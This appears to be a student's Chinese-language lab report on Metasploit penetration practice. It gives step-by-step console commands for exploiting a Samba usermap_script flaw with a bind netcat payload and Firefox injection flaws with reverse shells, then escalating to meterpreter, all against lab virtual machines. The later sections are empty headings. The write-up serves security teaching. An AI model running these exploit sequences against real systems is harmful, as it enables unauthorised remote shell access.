编程语言
首页 > 编程语言> > 20192409潘则宇 实验六 Metasploit攻击渗透实践

20192409潘则宇 实验六 Metasploit攻击渗透实践

作者:互联网

Metasploit攻击渗透实践

1.实验内容及要求

本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:

2.实验过程

2.1 主动攻击实践
(1)这里我选择了跟上次实践测试一样的靶机和漏洞进行渗透。使用的是王老师给的Linux靶机,利用的是靶机上Samba服务的usermap_script安全漏洞。
(2)要进行渗透,我们首先需要知道靶机的IP地址,所以就在靶机上使用ifconfig进行查询。

ifconfig

图一 查询靶机IP地址

(3)然后还是跟正常渗透一样,选择攻击模块,这里我们利用的是Samba服务上的漏洞,所以我们使用指令search samba对我们可以使用的攻击模块进行一个搜索,得到的结果如下图所示。

search samba

图二 查询攻击模块

(4)我们发现了我们需要选择的攻击模块,就是这个usermap_script,可以使用use exploit/multi/samba/usermap_script指令,或者直接用use 8,也就是使用我们检索出来的第八个模块的意思,也是一样的。

use exploit/multi/samba/usermap_script
use 8

图三 使用攻击模块

(5)然后需要对攻击载荷进行设置,我们还是一样,先使用show options查看所有可以使用的攻击载荷,查询结果如下所示。

show options

图四 查看攻击载荷

(6)我们找到我们想要的攻击载荷,也就是这个bind_netcat,所以我们使用指令set payload cmd/unix/bind_netcat或者是set payload 5来设置我们的攻击载荷。

set payload cmd/unix/bind_netcat
set payload 5

图五 设置攻击载荷

(7)然后就可以使用show options指令来查看我们需要添加的具体信息。

show options

图六 查看设置

(8)我们通过查看到的信息可以发现,我们只需要对RHOST也就是靶机的IP地址进行设置就可以了,所以我们使用指令set RHOST 192.168.189.131进行设置。

set RHOST 192.168.189.131

图七 设置RHOST

(9)最后,我们就可以使用exploit来获取靶机的Shell了。

exploit

图八 exploit

2.2 浏览器攻击实践
(1)这里采用的靶机是我自己安装的XP系统,要进行浏览器攻击,首先得选好浏览器,所以我选择了火狐浏览器(平时用的都是火狐)。
(2)首先我们还是要知道有什么攻击模块可以进行选择,所以我们使用search firefox指令来看看,得到了以下结果。

search firefox

图九 search firefox

(3)查询到的exploit开头的就是我们可以利用的漏洞,也就是我们要进行选择的攻击模块了。我们可以看到,可供我们进行渗透的模块还是很多的。其中有两个攻击模块引起了我的注意,分别是exploit/multi/browser/firefox_webidl_injection和exploit/multi/browser/firefox_tostring_console_injection,因为这两个攻击模块都带有“injection”也就是注入这个描述,所以我认为成功的概率比较大。我先尝试了exploit/multi/browser/firefox_webidl_injection模块的渗透测试,使用use 30指令可以直接选取这个攻击模块。

use exploit/multi/browser/firefox_webidl_injection
use 30

图十 选择攻击模块

(4)然后我们就可以查看一下有哪些攻击载荷可供选择,使用show payloads指令。

show payloads

图十一 查看攻击载荷

(5)我们能看到这里能选择的攻击载荷并不是很多,一共有九个,我们选择编号为2的这个攻击载荷,使用指令set payload 2。

set payload firefox/shell_reverse_tcp
set payload 2

图十二 选择攻击载荷

(6)选择完攻击载荷后我们就可以使用show options指令来查看我们需要添加或者修改的参数。

show options

图十三 查看参数

(7)我们可以发现,其他参数都已经自动填写了,需要我们进行补充的只有一个URIPATH,也就是我们生成的网址的填充部分,我们使用set指令将其设置为20192409pzy。

set URIPATH 20192409pzy

图十四 设置URIPATH

(8)设置完参数我们就可以开启监听啦。

exploit
run

图十五 exploit

(9)开启监听之后我们发现它给我们提供了一个网址,也就是http://172.16.213.126:8080/20192409pzy,我们需要将这个网址在我们的靶机也就是XP虚拟机中的火狐浏览器中进行访问,才能得靶机的Shell。我们在靶机的火狐进行访问之后,我们发现已经建立了反弹连接并生成了一个会话,渗透成功。

图十六 反弹连接成功

(10)反弹连接成功了,但是我们发现我们并不能对靶机进行操作,这是因为我们需要将会话打开,使用指令sessions -i 1,然后我们就可以进行操作了,比如这里我们使用的是dir指令。

sessions -i 1
dir

图十七 打开会话

(11)但是我们还想做进一步渗透,所以我们需要利用到火狐的另一个漏洞,我们使用指令use exploit/firefox/local/exec_shellcode打开对应的攻击模块。

use exploit/firefox/local/exec_shellcode

图十八 选择攻击模块

(12)然后我们还是一样使用show payloads指令来查看有哪些攻击载荷可以进行选择。

show payloads

图十九 查看攻击载荷

(13)这里攻击载荷非常多,有三百多个,我根据经验选择了编号为271的这个攻击载荷。

set payload windows/meterpreter/reverse_tcp 
set payload 271

图二十 选择攻击载荷

(14)还是一样使用show options来查看我们需要填写的参数,我们发现只需要填写一个会话号就可以了,所以我们使用指令set SESSION 2(因为前一个会话关了,所以这里是我新创建的一个会话),这样就可以了吗?不行,因为4444端口前面我们进行渗透的时候正在使用,所以这里我们需要将端口号换掉。

set SESSION 2
set LPORT 8888

图二十一 设置会话号

图二十二 设置端口

(15)这样设置完之后我们就可以开启监听啦。

exploit
run

图二十三 exploit

(16)我们发现,进一步渗透也成功啦。我们同样使用dir指令来测试,我们发现在meterpreter界面下,渗透更加深入,我们得到的信息也更加清晰完整。

图二十四 dir操作

(17)然后我们就进行另一个漏洞的渗透,过程都是一样的。我们还是先选择攻击模块,使用指令use exploit/multi/browser/firefox_tostring_console_injection或者是use 39。

use exploit/multi/browser/firefox_tostring_console_injection
use 39

图二十五 选择攻击模块

(18)同样的我们选择编号为2的攻击载荷。

set payload firefox/shell_reverse_tcp
set payload 2

图二十六 设置攻击载荷

(19)然后设置URIPATH为201912409,并开启监听。

set URIPATH 20192409
explit
run

图二十七 设置URIPATH并开启监听

(20)这时候我们发现反弹连接成功,照旧打开会话,就可以进行一系列操作了。

sessions -i 1
dir

图二十八 打开会话并查看dir

(21)后面进一步渗透的部分与前面一样,就不再赘述了。
2.3 客户端攻击实践
2.4 辅助模块应用

标签:Metasploit,载荷,20192409,攻击,exploit,set,模块,潘则宇,我们
来源: https://www.cnblogs.com/20001009fxy/p/16248905.html